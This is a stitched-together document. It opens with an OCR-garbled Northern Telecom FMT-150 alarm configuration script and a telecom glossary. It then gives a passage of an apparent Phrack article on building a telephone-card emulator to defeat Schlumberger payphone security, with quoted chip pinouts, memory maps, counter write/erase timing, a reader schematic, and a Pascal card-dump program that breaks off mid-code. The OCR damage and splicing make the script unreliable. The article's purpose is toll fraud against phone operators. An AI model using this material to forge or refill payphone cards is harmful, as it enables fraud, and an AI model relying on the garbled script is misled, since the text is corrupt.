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MESSAGE "Enter two digit month + <ENTER>. Use 0’s if required." 
,OCATE 10,58 

GET S4 2 ; 2 DIGIT MONTH 
OCATE 12,2 

MESSAGE "Enter two digit day + <ENTER>. Use 0’s if required." 
LOCATE 12,56 

GET S5 2 ; 2 DIGIT DAY 
CLEAR 

LOCATE 6,2 

MESSAGE "Enter time." 
LOCATE 8,2 
MESSAGE "Enter two digit hour + <ENTER>. Use 0’s if required." 
,OCATE 8,57 

GET S6 2 ; 2 DIGIT HOUR 
,OCATE 10,2 

MESSAGE "Enter two digit minute + <ENTER>. Use 0’s if required. 
,OCATE 10,59 

GET S7 2 ; 2 DIGIT MINUTE 
CLEAR 


;SET TIME DP3025 
SMIT "CT" 
SMIT S6 
SMIT "" 
SMIT S7 

TRANSMIT " !" 
S 
S 
R 


7PROMPT THE USER TO CHECK INPUTS FOR LOCATIONS 
LOCATE 1,2 
MESSAGE "Please verify the following information." 
LOCATE 4,2 

MESSAGE "LOCATION A CLLI COD 
,OCATE 4,26 

MESSAGE SO 

LOCATE 6,2 

MESSAGE "LOCATION B CLLI COD 
LOCATE 6,26 

MESSAGE S1 

LOCATE 8,2 

MESSAGE "LOCAL LOCATION CLLI CODE =" 

LOCATE 8,29 

MESSAGE S2 

LOCATE 10,2 

MESSAGE "SYSTEM ID = " 

LOCATE 10,17 

MESSAGE S8 

OCATE 12,2 

MESSAGE "SYSTEM NUMBER = " 

OCATE 12,21 

MESSAGE S9 

LOCATE 17,2 

MESSAGE "IS INFORMATION CORRECT? Y/N + <ENTER>" 
LOCATE 17,44 

GET S8 1 
SWITCH S8 

CASE "Y" 

7DO NOTHING 
iINDCASE 
EFAULT 
GOTO LABEL1 ; JUMP TO TOP AND EN 
ENDCASE 
ENDSWITCH 
CLEAR 
OCATE 8,15 


— W 


eal 
| 


ea] 
| 


5 


O 


H 


ER INFORMATION AGAIN 
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MESS 


AG 


ALAR 
PAUS 


“OK. ¢ *HE 


RE WE 


GOs 


MIT 


S) 
iS) 
S) 
SMIT 
iS) 
iS) 
iS) 


E NODE 


rep! 
$3 


W W 


S4 


W W 


S5 


wou. 


1 USI 


s 
SMIT 
SMIT 
SMIT 
SMIT 


ea) 


NODE 


"CGNN1 


WNW 
So 
WNW 


wow 


2 USI 


MIT 
MIT 
MIT 
MIT 
MIT 


NNNnNANnNN 


"CGNN2 


WNW 
SL 
WNW 


wow 


INE 


SITE 


E DP3024 


NG CENTRAL OFFICE 


[J 


CLLI COD 


W 


NG REMOTE 


CLLI COD 


[7] 


W 


TRANSMIT 
; TRANSMIT 
; TRANSMIT 
; TRANSMIT 
; TRANSMIT 
; TRANSMIT 
; TRANSMIT 


MEGS2. dex2. ae 


WNW 


SO 


WNW 


Sl 


E CUSTOMER OUTPUT POINTS 


TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 
TRAN 


MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 


"CGNO1 
WNW BAY 
Ww ! Ww 
"CGNO2 
WNW BAY 
Ww ! Ww 
"CGNO3 
WNW OP aD 


wow 


W 


MINOR vow 


W 


MAJOR vw 


Vn 
Li 


Vn 
Li 


MIT 
MIT 


2 
Zz 


MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 
MIT 


Bee eee ee ee ee eee eee eee ees 
A 


Tx, MN 


W 


RX Vn 


ALARM #1‘*"" 


ALARM #2*‘"" 


iS 


DP3013 


6 


"DO NOT PRESS ANY KEYS UNTIL CONFIGURATION COMPLET 
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TRANSMIT "*‘"HSA ALARM*‘"™" 
TRANSMIT "!" 
TRANSMIT "CGNO11 " 
TRANSMIT "*‘"HSB ALARM*‘"™" 
TRANSMIT "!" 

; TRANSMIT "CGNO12 " 

; TRANSMIT "*‘"DS1 GRP FATIL‘"™" 
; TRANSMIT "!" 

TRANSMIT "CGNO13 " 


by bs RANSMIT WNW 

TRANSMIT S9 

rT RANSMIT WNW 

TRANSMIT "!" 

TRANSMIT "CGNO14 " 

TRANSMIT "*"COM EQUIP ALRM*‘"" 
TRANSMIT "!" 

TRANSMIT "CGNO15 " 

TRANSMIT "‘"NODE #1 CO*%"" 
TRANSMIT "!" 

TRANSMIT "CGNO16 " 

TRANSMIT "‘"NODE #2 REMOTE*"" 
TRANSMIT "!" 

;DELETE ALL EXISTING CUSTOMER OUTPUTS 
TRANSMIT "CGO1l D*!" 

TRANSMIT "CGO2 D*!" 

TRANSMIT "CGO3 D*!" 

TRANSMIT "CGO4 D*!" 

TRANSMIT "CGO5 D*!" 

TRANSMIT "CGO6 D*!" 

TRANSMIT "CGO7 D*!" 

TRANSMIT "CGO8 D*!" 

TRANSMIT "CGO9 D*!" 

TRANSMIT "CGO10 D*!" 

TRANSMIT "CGO11 D*!" 

TRANSMIT "CGO12 D*!" 

TRANSMIT "CGO13 D*!" 

TRANSMIT "CGO14 D*!" 

TRANSMIT "CGO15 D*!" 

TRANSMIT "CGO16 D*!" 
;CUSTOMER OUTPUTS 1-2 
TRANSMIT "CGO1l AS1 G100 !" 
TRANSMIT "CGO2 AS1 G120 !" 
;CUSTOMER OUTPUTS 3-9 
TRANSMIT "CGO3 AS1 G107 !" 
TRANSMIT "CGO4 AS1 G108 !" 
TRANSMIT "CGO5 AS1 G101 !" 
TRANSMIT "CGO5 AS1 G102 !" 
TRANSMIT "CGO5 AS1 G103 !" 
TRANSMIT "CGO6 AS1 G104 !" 
TRANSMIT "CGO6 AS1 G105 !" 
TRANSMIT "CGO6 AS1 G106 !" 
TRANSMIT "CGO7 AS1 G109 !" 
TRANSMIT "CGO8 AS1 G110 !" 
TRANSMIT "CGO9 AS1 G111 !" 
;CUSTOMER OUTPUTS 10-11 
TRANSMIT "CGO10 AS1 M1 MH18 !" 
TRANSMIT "CGO10 AS1 M2 MH18 !" 
TRANSMIT "CGO10 AS1 M3 MH18 !" 
TRANSMIT "CGO11 AS1 M1 MH19 !" 
TRANSMIT "CGO11 AS1 M2 MH19 


TRANSMIT "CGO11 AS1 M3 MH19 
; TRANSMIT "CGO12 AS1 M1 1H2 
; TRANSMIT "CGO12 AS1 M2 1H2 
; TRANSMIT "CGO12 AS1 M3 1H2 
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; TRANSMIT "CGO12 AS1 M1 1H3 !" 
; TRANSMIT "CGO12 AS1 M2 1H3 !" 
; TRANSMIT "CGO12 AS1 M3 1H3 !" 


;CUSTOMER OUTPUT 13, 14 


TRANSMIT "CGO13 AS1 G100 !" 
TRANSMIT "CGO13 AS1 G120 !" 
TRANSMIT "CGO14 AS1 G112 !" 
;CUSTOMER OUTPUTS 15, 16 
TRANSMIT "CGO15 AN1 G100 !" 
TRANSMIT "CGO15 AN1 G120 !" 
TRANSMIT "CGO16 AN2 G100 !" 
TRANSMIT "CGO16 AN2 G120 !" 
7SET TO AUTOMATIC CONTROL 
TRANSMIT "CGOl1 CA!" 
TRANSMIT "CGO2 CA!" 
TRANSMIT "CGO3 CA!" 
TRANSMIT "CGO4 CA!" 
TRANSMIT "CGO5 CA!" 
TRANSMIT "CGO6 CA!" 
TRANSMIT "CGO7 CA!" 
TRANSMIT "CGO8 CA!" 
TRANSMIT "CGO9 CA!" 
TRANSMIT "CGO10 CA!" 
TRANSMIT "CGO11 CA!" 
TRANSMIT "CGO12 CA!" 
TRANSMIT "CGO13 CA!" 
TRANSMIT "CGO14 CA!" 
TRANSMIT "CGO15 CA!" 
TRANSMIT "CGO16 CA!" 

’ 

;DEFINE CUSTOMER OUTPUT 12 
TRANSMIT "CGO12 D*!" 
TRANSMIT "CGNO12 " 

TRANSMIT "‘"EXT ALM*"™" 
TRANSMIT "!" 

TRANSMIT "CGO12 AN2 G118 !" 
;also attach to pt 13 for alarm center 
TRANSMIT "CGO13 AN2 G118 !" 
f 

;DEFINE CUSTOMER INPUTS 
TRANSMIT "CGNI1 " 

TRANSMIT "*‘"SMOKE DET. *"" 
TRANSMIT "!" 

TRANSMIT "CGNI2 " 

TRANSMIT "*"SUMP PUMP *"" 
TRANSMIT "!" 

TRANSMIT "CGNI3 " 

TRANSMIT "*"OPEN DOOR*"™" 
TRANSMIT "!" 

TRANSMIT "CGNI4 " 

TRANSMIT "*‘"AC PWR FAIL‘*‘"" 
TRANSMIT "!" 

TRANSMIT "CGNI5 " 

TRANSMIT "*‘"HI-LO TEMP *"" 
TRANSMIT "!" 

TRANSMIT "CGNI6 " 

TRANSMIT "‘"RECT. FAIL‘*"" 
TRANSMIT "!" 

TRANSMIT "CGNI7 " 

TRANSMIT "‘"BATT FLOAT *"" 
TRANSMIT "!" 


;ADD CONDITIONS TO CUSTOMER OUTPUT 1 
TRANSMIT "CGO1l AN2 SS5 !" 
TRANSMIT "CGO1l AN2 SS6 !" 
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TRANSMIT "CGO1l AN2 SS7 !" 


’ 
;ADD CONDITIONS TO CUSTOMER OUTPUT 2 
TRANSMIT "CGO2 AN2 SS1 !" 

TRANSMIT "CGO2 AN2 SS2 ! 
TRANSMIT "CGO2 AN2 SS3 !" 
TRANSMIT "CGO2 AN2 SS4 ! 


ie 


;7PER JOE OLSZTYN SWITCHING SYSTEMS STAFE 
; LEAVE PERFORMANCE MONITORING AT FACTORY DEFAULT 
;DISABLE BLUE INSERTION FOR POINT TO POINT SYSTEMS 


7IN A MULTIPOINT SYSTEM BLUE INSERTION SHOULD BE ENABLE 


; ENABLE ALARM LOGGER 
TRANSMIT "CAD!" 


;DISABLE BLUE INSERTION NODE 1 DP3019 
TRANSMIT "CN 1 BE!" 
TRANSMIT "CN 2 BE!" 
TRANSMIT "CN 3 BE!" 

ENABLE PARITY CORRECTION NODE 1 DP3020 
TRANSMIT "CN1 Tl PE!" 
TRANSMIT "CN1 T2 PE!" 
TRANSMIT "CN1 T3 PE!" 

ENABLE RX OVERHEAD NODE 1 DP3021 
TRANSMIT "CN1 Tl RE!" 
TRANSMIT "CN1 T2 RE!" 
TRANSMIT "CN1 T3 RE!" 

ENABLE TX OVERHEAD NODE 1 DP3022 
TRANSMIT "CN1 Tl TE!" 
TRANSMIT "CN1 T2 TE!" 
TRANSMIT "CN1 T3 TE!" 


NAL DEGRADE 10E-8 NODE 1 DP3158 
TRANSMIT "CN1 T1 S8!" 
iS) 
S) 


MIT "CN1 T2 S8!" 
MIT "CN1 T3 S8!" 


;DISABLE BLUE INSERTION NODE 2 DP3019 
TRANSMIT "CN2 T1 BE!" 
TRANSMIT "CN2 T2 BE!" 
TRANSMIT "CN2 T3 BE!" 

;ENABLE PARITY CORRECTION NODE 2 DP3020 
TRANSMIT "CN2 T1 PE!" 
TRANSMIT "CN2 T2 PE!" 
TRANSMIT "CN2 T3 PE!" 

;ENABLE RX OVERHEAD NODE 2 DP3021 
TRANSMIT "CN2 T1 RE!" 
TRANSMIT "CN2 T2 RE!" 
TRANSMIT "CN2 T3 RE!" 

;ENABLE TX OVERHEAD NODE 2 DP3022 
TRANSMIT "CN2 T1 TE!" 
TRANSMIT "CN2 T2 TE!" 
TRANSMIT "CN2 T3 TE!" 

;SIGNAL DEGRADE 10E-8 NODE 2 DP3158 
TRANSMIT "CN2 T1 S8!" 
TRANSMIT "CN2 T2 S8!" 
TRANSMIT "CN2 T3 S8!" 


; LINE LEARN ALL MULTIPLEXERS BOTH NODES 
TRANSMIT "CN1 M1 L!" 
TRANSMIT "CN1 M2 L!" 
TRANSMIT "CN1 M3 L!" 
TRANSMIT "CN2 M1 L!" 
TRANSMIT "CN2 M2 L!" 
TRANSMIT "CN2 M3 L!" 


; CONFIGURATION IS COMPLETE EXIT THE PROGRAM 
BAR 


MESSAGE "...... CONFIGURATION COMPLETE...... " 


MESSAGE "CONTINUE WITH SECTION 5 OF CERTIFICATION" 


ALARM 2 

PAUSE 5 

EXIT 

Glossary of Terms 

4w Four Wire 

ACO Alarm Cut-Off 

ACTV Active (module -- carrying traffic) 

AGC Automatic Gain Control 

AIS Alarm Indication Signal -- indicates an alarm upstream 

AMI Alternate Mark Inversion -- a technique by which the polarity of 
alternate pulses is inverted 

APD Avalanche Photo Diode -- used for detecting pulses of light 
at the receive end of an optical fiber 

AUD Audible alarm 

BDF Battery Distribution Frame 

BER Bit Error Rate 

BIP Bit Interleave Parity 

BPV Bipolar Violation -- signal is not alternating as expected 

CAMMS Centralized Access Maintenance and Monitoring System -- 
a bay-mounted shelf with push buttons and a luminescent display, 
which is used to control FMT-150 networks, as well as other 
Northern Telecom transmission equipment 

CDP Centralized Display Panel 

CEV Controlled Environment Vault 

CO Central Office 

CPC Common Product Code -- a Northern Telecom code used to identify 
equipment 

DDD Direct Distance Dialing 


DM-13 Digital Multiplexer which multiplexes between DS-1/1C/2 signals 
and DS-3 signals 


DNA Dynamic Network Architecture 

E2A A serial interface for alarm polling of equipment 
FE Frame Error 

FER Frame Error Rate 

FL Frame Loss 

FLC Frame Loss Counter 

FLS Frame Loss Seconds 

Future Product to be Developed 


Group A multiplexed signal made up of four DS-1s, two DS-1Cs, or 
one DS-2 

Hub An FMT-150 site which branches one 150 Mb/s signal into two or 
three signals, in different directions, without sacrificing 
OA & M continuity 

LBR Loopback Request 

MCU Maintenance Control Unit 

MM Multimode Optical Fiber 

MSB Most Significant Bit 

Muldem Multiplexer/demultiplexer 

NRZ Non-Return to Zero 

OTT Optical Termination Tray 

PEC Product Engineering Code -- a Northern Telecom code used to identify 
equipment. The preferred code to be used when ordering Northern 
Telecom equipment. 


PER Parity Error Rate 

PES Parity Error Seconds 

RTO Ready To Order 

SCU Service Channel Unit 

SMB Sub-Miniature BNC type connector 

SR Stuff Request 

STX (Pseudo) Synchronous Transport Signal: First Level at 
49.92 Mb/s (Northern Telecom) 

TBOS Telemetry Byte Oriented System 

VIS Visual Alarm 

WDM Wavelength Division Multiplexing 


XOW Express Orderwire 
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==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 10 of 18 


Electronic Telephone Cards: How to make your own! 


I guess that Sweden is not the only country that employs the electronic 
phone card systems from Schlumberger Technologies. This article will 
explain a bit about the cards they use, and how they work. At the end of 
this article you will also find a UUEncoded file which contains source 
code for a PIC16C84 micro-controller program that completely emulates a 
Schlumberger Telephone card and of course printed circuit board layouts 
+ a component list... But before we begin talking seriously of this 
matter I must first make it completely clear that whatever you use this 
information for is entirely YOUR responsibility, and I cannot be held 
liable for any problems that the use of this information can cause for 
you or for anybody else. In other words: I give this away FOR FREE, and 
I don't expect to get ANYTHING back in return! 


The Original Telephone Card: 

Since I probably would have had a hard time writing a better article 
than the one Stephane Bausson from France wrote a while ago, I will not 
attempt to give a better explanation than that one; I will instead 
incorporate it in this phile, but I do want to make it clear that the 
following part about the cards' technical specification was not written 
by me: only the parts in quotes are things added by me... Instead I 
will concentrate on explaining how to build your own telephone card 
emulator and how the security measures in the payphone system created by 
Schlumberger Technologies work, and how to trick them... But first, let's 
have a look at the technical specifications of the various "smart memory 
card" systems used for the payphones. 


<Start of text quoted from Stephane Bausson (sbausson@ensem.u-nancy.fr) > 


What you need to know about electronics telecards 


(C) 10-07-1993 / 03-1994 
Version 1.06 
Stephane BAUSSON 


Email: sbausson@ensem.u-nancy.fr 
Smail: 4, Rue de Grand; F-88630 CHERMISEY; France 
Phone: (33)-29-06-09-89 


Any suggestions or comments about phonecards and smart-cards are welcome 


Content 


I) The cards from Gemplus, Solaic, Schlumberger, Oberthur: (French cards) 

   I-1) Introduction: 
   I-2) SCHEMATICS of the chip: 
   I-3) PINOUT of the connector: 
   I-4) Main features: 
   I-5) TIME DIAGRAMS: 
   I-6) Memory MAP of cards from France and Monaco: 
   I-7) Memory MAP of cards from other countries: 

II) The cards from ODS: (German cards) 

   II-1) Introduction: 
   II-2) Pinout: 
   II-3) Main features: 
   II-4) Time Diagrams: 
   II-5) Memory Map: 
   II-6) Electrical features: 

III) The Reader Schematic: 

IV) The program: 

I.) The cards from Gemplus, Solaic, Schlumberger, Oberthur: (French cards) 


I-1) Introduction: 


You must not think that the electronic phonecards are 
completely secret things, and that you can not read the information that 
is inside. It is quite false, since in fact an electronic phonecard does 
not contain any secret information like credit cards, and an electronic 
phonecard is nothing else than a 256 bit EPROM with serial output. 


Besides do not think that you are going to refill them when you 
understand how they work, since for that you should reset the 256 bits 
of the cards by erasing the whole card. But the chip is coated in UV 
opaque resin even if sometimes you can see it as transparent! Even if 
you were smart enough to erase the 256 bits of the card you should 
program the manufacturer area, but this is quite impossible since the 
first 96 bits are write protected by a lock-out fuse that is fused after 
the card programming in factory. 


Nevertheless it can be very interesting to study how these cards 
work, to see which kind of data are inside and how the data are mapped 
inside or to see how many units are left for example. Besides 
there are a great number of applications of these cards when they are 
used (only for personal usage of course), since you can use them as a key 
to open a door, or you can also use them as a key to secure a program, 
etc... 


These Telecards have been created in 1984 and at this time 
constructors decided to build these cards in NMOS technology but now, 
they plan to change by 1994 all readers in the public booths and use 
CMOS technology. Also they plan to use EEPROM to secure the cards and to 
add many useful informations in, and you will perhaps use phone cards to 
buy your bread or any thing else. 


These cards are called Second Generation Telecards. 


I-2) SCHEMATICS of the chip: 

   [Block diagram of the chip (not reproducible here): inputs Clk, R/W, 
   Reset, Fuse and Vpp; one output, Out (serial output). Only the 
   position of the chip is standardized and not the pinout.] 

I-3) PINOUT of the connector: 

          AFNOR                         ISO 
       +-------\                     +-------\ 
       | 8   4 |                     | 1   5 | 
       | 7   3 |                     | 2   6 | 
       | 6   2 |                     | 3   7 | 
       | 5   1 |                     | 4   8 | 
       +-------/                     +-------/ 

 NB: 
 PINOUT:   1 : Vcc = 5V      5 : Gnd 
 ------    2 : R/W           6 : Vpp = 21V 
           3 : Clock         7 : I/O 
           4 : Reset         8 : Fuse 

I-4) Main features: 

 - Synchronous protocol. 
 - N-MOS technology. 
 - 256x1 bit organization. 
 - 96 bits write protected by a lock-out fuse. 
 - Low power 85mW in read mode. 
 - 21 V programming voltage. 
 - Access time: 500ns 
 - Operating range: -10oC +70oC 
 - Ten year data retention. 
I-5) TIME DIAGRAMS: 

   [Timing diagram (not reproducible here): the Vpp line (+5V, raised to 
   +21V during a write) and the Reset, Clock, R/W and Out lines (0V/+5V), 
   for the sequence: card reset, bit 1 reading, bit 2 reading, bit 2 
   writing to 1 (two 50 ms windows), bit 3 reading.] 

I-6) MEMORY MAP of cards from France and Monaco: 


   Bytes    Bits          Binary      Hexa 
    1        1 -->   8                      ---> Builder code. 
    2        9 -->  16    0000 0011   $03   ---> a French telecard 
    3       17 -->  24 
    4       25 -->  32 
    5       33 -->  40 
    6       41 -->  48 
    7       49 -->  56 
    8       57 -->  64 
    9       65 -->  72 
   10       73 -->  80 
   11       81 -->  88 
   12       89 -->  96    0001 0011   $13   ---> 120 units card 
                          0000 0110   $06   ---> 50 units card 
                          0000 0101   $05   ---> 40 units card 
   13-31    97 --> 248                      ---> The units area: each time a unit 
                                                 is used, then a bit is set to "1"; 
                                                 Generally the first ten units are 
                                                 fused in factory as test. 
   32      249 --> 256    1111 1111   $FF   ---> the card is empty 


I-7) MEMORY MAP of the other cards: 


   Bytes    Bits          Binary                  Hexa 
    1        1 -->   8 
    2        9 -->  16    1000 0011               $83       ---> a telecard 
    3-4     17 -->  32    1000 0000 0001 0010     $80 $12   ---> 10 units card 
                          1000 0000 0010 0100     $80 $24   ---> 22 units card 
                          1000 0000 0010 0111     $80 $27   ---> 25 units card 
                          1000 0000 0011 0010     $80 $32   ---> 30 units card 
                          1000 0000 0101 0010     $80 $52   ---> 50 units card 
                          1000 0000 1000 0010     $80 $82   ---> 80 units card 
                          1000 0001 0000 0010     $81 $02   ---> 100 units card 
                          1000 0001 0101 0010     $81 $52   ---> 150 units card 
    5       33 -->  40 
    6       41 -->  48 
    7       49 -->  56 
    8       57 -->  64 
    9       65 -->  72 
   10       73 -->  80 
   11       81 -->  88 
   12       89 -->  96    0001 1110               $1E       ---> Sweden 
                          0010 0010               $22       ---> Spain 
                          0011 0000               $30       ---> Norway 
                          0011 0011               $33       ---> Andorra 
                          0011 1100               $3C       ---> Ireland 
                          0100 0111               $47       ---> Portugal 
                          0101 0101               $55       ---> Czech Republic 
                          0101 1111               $5F       ---> Gabon 
                          0110 0101               $65       ---> Finland 
   13-31    97 --> 248                                      ---> The units area: each time a unit 
                                                                 is used, then a bit is set to "1"; 
                                                                 Generally the first two units are 
                                                                 fused in factory as test. 
   32      249 --> 256    0000 0000               $00 


II) The cards from ODS, Giesecke & Devrient, ORGA Kartensysteme, 
Uniqua, Gemplus, Schlumberger and Oldenbourg Kartensysteme: 


II-1) Introduction 


These cards are in fact 128 bit memory in NMOS technology, and 
the map of these cards is the following: 

   64 bit EPROM write protected (manufacturer area). 
   40 bit EEPROM (5x8 bits). 
   24 bits set to "1". 


II-2) Pinout: 

          ISO 7816-2 
        +-------\            1 : Vcc = 5V      5 : Gnd 
        | 1   5 |            2 : R             6 : n.c. 
        | 2   6 |            3 : Clock         7 : I/O 
        | 3   7 |            4 : n.c.          8 : n.c. 
        | 4   8 | 
        +-------/            n.c. : not connected 


II-3) Main features: 


 - ISO 7816-1/2 compatible. 
 - use a single 5V power supply. 
 - low power consumption. 
 - NMOS technology. 


II-4) Time Diagrams: 


The address counter is reset to 0 when the clock line CLK is raised 
while the control line R is high. Note that the address counter can not 
be reset when it is in the range 0 to 7. 

   [Timing diagram (not reproducible here): Reset, Clk and Data lines; 
   the address counter goes n, 0, 1, 2, 3, 4 while the data output shows 
   Bit n, Bit 0, Bit 1, Bit 2, Bit 3.] 

The address counter is incremented by 1 with each rising edge of the 
clock signal Clk, for as long as the control line R remains low. The 
data held in each addressed bit is output to the I/O contact each time Clk 
falls. It is not possible to decrement the address counter, therefore 
to address an earlier bit, the address counter must be reset then 
incremented to the required value. 


All unwritten or erased bits in the address range 64-104 may be written 
to. When a memory cell is written to, it is set to 0. The addressed 
cell is written to by the following sequence. 


1- R is raised while Clk is low, to disable address counter increment 
for one clock pulse. 


2- Clk is then raised for a minimum of 10ms to write to the addressed bit. 
When the write operation ends, and Clk falls, the address counter is 
unlocked, and the content of the written cell, which is now 0, is output 
to the I/O contact if the operation is correct. 


The next Clk pulse will increment the address by one, then the write 
sequence can be repeated to write the next bit. 


   [Timing diagram (not reproducible here): Reset, Clk and I/O for two 
   consecutive writes, at address n+1 and n+2, each with its write 
   window.] 

WriteCarry: 

A counter is erased by performing the WRITECARRY sequence on the 
stage of the next highest weighting to that to be erased. 
The writecarry sequence is as follows: 

1 - Set the address counter to an unwritten bit in the next highest 
counter stage to that to be erased. 
2 - Increment is disabled on the following rising edge of R where Clk 
remains low. 
3 - Clk is then raised for a minimum of 10ms, while R is low, to write 
to the next address bit. 
4 - R is then raised again while Clk remains low to disable increment a 
second time. 
5 - Clk is then raised for a minimum of 1ms, while R is low, to write to 
the addressed bit a second time, erasing the counter level immediately 
below that of the addressed bit. 

   [Timing diagram (not reproducible here): Rst, Clk and I/O at address n 
   and n+1: Write, then Erase.] 
II-5) Memory Map: 
   Bytes    Bits          Binary      Hexa 
    1        1 -->   8 
    2        9 -->  16    0010 1111   $2F   ---> Germany 
                          0011 0111   $37   ---> Netherland 
                          0011 1011   $3B   ---> Greece 
    3       17 -->  24 
    4       25 -->  32                      ---> Issuer area (write protected) 
    5       33 -->  40 
    6       41 -->  48 
    7       49 -->  56 
    8       57 -->  64 
    9       65 -->  72                      ---> c4096 ) 
   10       73 -->  80                      ---> c512  ) 
   11       81 -->  88                      ---> c64   ) 5 stage octal counter 
   12       89 -->  96                      ---> c8    ) 
   13       97 --> 104                      ---> c0    ) 
   14      105 --> 112    1111 1111   $FF 
   15      113 --> 120    1111 1111   $FF   ---> area of bits set to "1" 
   16      121 --> 128    1111 1111   $FF 


The Issuer area: 


This issuer area consists of 40 bits. The contents of the issuer area are 
specified by the card issuer, and are fixed during the manufacturing 
process. The contents of the issuer area will include data such as 
serial numbers, dates, and distribution centers. 


This area may only be read. 


The Counter area: 


The counter area stores the card’s units. Its initial value is 
specified by the card issuer and set during manufacturing. 


The counter area is divided into a 5 stage abacus. 


Note that you can only decrease the counter and it is not authorized to 
write in the counter a value greater than the old value. 


II-6) Electrical features: 


Maximum ratings: 

                                Symbol    Min     Max    Unit 
   Supply voltage               Vcc      -0.3      6     V 
   Input voltage                Vi       -0.3      6     V 
   Storage temperature          Tstg     -20      +55    oC 
   Power dissipation            Pd         -      50     mW 


DC characteristics: 

                                Symbol   Min.   Typ.   Max.   Unit 
   Supply current               Icc       -      -             mA 
   Input voltage (low)          Vil       0      -      0.8   V 
   Input voltage (high)         Vih       3.5    -      Vcc   V 
   Input current R              Ih        -      -      100   uA 
   Input current Clk            Il        -      -      100   uA 
   Output current (Vol=0.5V)    Iol       -      -      10    uA 
   Output current (Voh=5V)      Ioh       -      -      0.5   mA 


AC characteristics: 

                                Symbol   Min.   Max.   Unit 
   Pulse duration R address     tr        50     -      us 
     reset 
   Pulse duration R write       ts        10     -      us 
   High level Clk               th        8      -      us 
   Low level Clk                tl        12     -      us 
   Write window                 Twrite    10     -      ms 
   Erase window                 Terase    10     -      ms 
                                tv1       5      -      us 
                                tv2       3      -      us 
                                tv3              -      us 
                                tv4       3      -      us 
                                tv5              -      us 
                                tv6       5      -      us 
                                tv7       5      -      us 
                                tv8       10     -      us 
III) The Reader Schematic: 

   [Reader schematic (ASCII drawing, not reproducible here). Parts named 
   in the drawing: T1 BC107 NPN, T2 BC177 PNP, resistors 220, 22k, 
   r3 220k, r4 390k, r5 15k, r6 150k, r7 10, d1 to d13 1N4148, a 22.5V 
   battery for Vpp, an optional external 5V supply. The Centronics port 
   lines D0..D7, Ack, Busy and Strobe drive the chip connector contacts 
   Reset, Clk, R/W, Vpp, I/O, Gnd and 5V.] 


IV) The program: 


The following program will enable you to read telecards on your PC if you 
build the reader. 


---------------------------- cut here (begin) ---------------------------- 

{*************************************************************************} 
{                                                                         } 
{                         T E L E C A R D . P A S                         } 
{                                                                         } 
{*************************************************************************} 
{ This program enable you to dump the memory of electronics phonecards    } 
{ from all over the world, so that you will be able to see which country  } 
{ the card is from, how many units are left and so on                     } 
{*************************************************************************} 
{ Written by Stephane BAUSSON (1993)                                      } 
{ Email: sbausson@ensem.u-nancy.fr                                        } 
{ Snail Mail Address: 4, Rue de Grand                                     } 
{                     F-88630 CHERMISEY                                   } 
{                     France                                              } 
{*************************************************************************} 
{ Thanks to: Tomi Engdahl (Tomi.Engdahl@hut.fi)                           } 
{*************************************************************************} 

USES crt,dos; 

CONST port_address=$378;        { lpt1 chosen } 

TYPE  string8=string[8]; 
      string2=string[2]; 

VAR   reg         : registers; 
      i,j         : integer; 
      Data        : array[1..32] of byte; 
      car         : char; 
      byte_number : integer; 
      displaying  : char; 

{ Write one byte to the Centronics data lines D0..D7 } 
PROCEDURE Send(b:byte); 
BEGIN port[port_address]:=b; 
END; 

{ Read the Centronics status lines; the card output is on bit 3 } 
FUNCTION Get:byte; 
BEGIN get:=port[port_address+1]; 
END; 

{ Convert a 4 bit value to one hexadecimal character } 
FUNCTION dec2hexa_one(value:byte):char; 
BEGIN case value of 
        0..9   : dec2hexa_one:=chr(value+$30); 
        10..15 : dec2hexa_one:=chr(value+$37); 
      END; 
END; 

{ Convert a byte to its two character hexadecimal representation } 
FUNCTION d2h(value:byte):string2; 
VAR msbb,lsbb:byte; 
BEGIN msbb:=value div $10; 
      lsbb:=value and $0F; 
      d2h:=dec2hexa_one(msbb)+dec2hexa_one(lsbb); 
END; 

{ Return the 8 bit binary representation of a byte, MSB first } 
FUNCTION Binary(b:byte):string8; 
VAR weight : byte; 
    s      : string8; 
BEGIN weight:=$80; 
      s:=''; 
      while (weight > 0) do 
      BEGIN if ((b and weight) = weight) then s:=s+'1' 
                                         else s:=s+'0'; 
            weight:=weight div $02; 
      END; 
      Binary:=s; 
END; 

{ Count the bits set to "1" in the units area (bytes 13 to 31) of a 
  256 bit card: whole bytes first, then the leading ones of the next byte } 
FUNCTION Units:byte; 
VAR i,u : integer; 
    s   : string8; 
BEGIN u:=0; 
      i:=13; 
      while (i < 32) and (Data[i] = $FF) do 
      BEGIN u:=u+8; 
            i:=i+1; 
      END; 
      s:=Binary(Data[i]); 
      while (s<>'') and (s[1]='1') do 
      BEGIN inc(u); 
            s:=copy(s,2,length(s)); 
      END; 
      units:=u; 
END; 

{ Value of the 5 stage counter of a 128 bit card } 
FUNCTION Units_2:LongInt; 
BEGIN Units_2:=4096*Data[9]+512*Data[10]+64*Data[11]+8*Data[12]+Data[13]; 
END; 

{ Identify the card from bytes 2, 3-4 and 12, and print the units left: 
  the capacity plus the test-fused units, minus the bits set to "1" } 
PROCEDURE Card_Type; 
BEGIN case Data[2] of 
        $03: BEGIN write('Telecard France - '); 
                   case Data[12] of 
                     $13: write('120 Units - ',130-units,' Units left'); 
                     $06: write('50 Units - ',60-units,' Units left'); 
                     $05: write('40 Units - ',50-units,' Units left'); 
                   END; 
             END; 
        $2F: BEGIN write('Telecard Germany - ',Units_2,' Units left'); 
             END; 
        $3B: BEGIN write('Telecard Greece - ',Units_2,' Units left'); 
             END; 
        $83: BEGIN write('Telecard'); 
                   case Data[12] of 
                     $1E: write(' - Sweden'); 
                     $30: write(' - Norway'); 
                     $33: write(' - Andorra'); 
                     $3C: write(' - Ireland'); 
                     $47: write(' - Portugal'); 
                     $55: write(' - Czech Republic'); 
                     $5F: write(' - Gabon'); 
                     $65: write(' - Finland'); 
                   END; 
                   if (Data[12] in [$30,$33,$3C,$47,$55,$65]) then 
                   BEGIN case ((Data[3] and $0F)*$100+Data[4]) of 
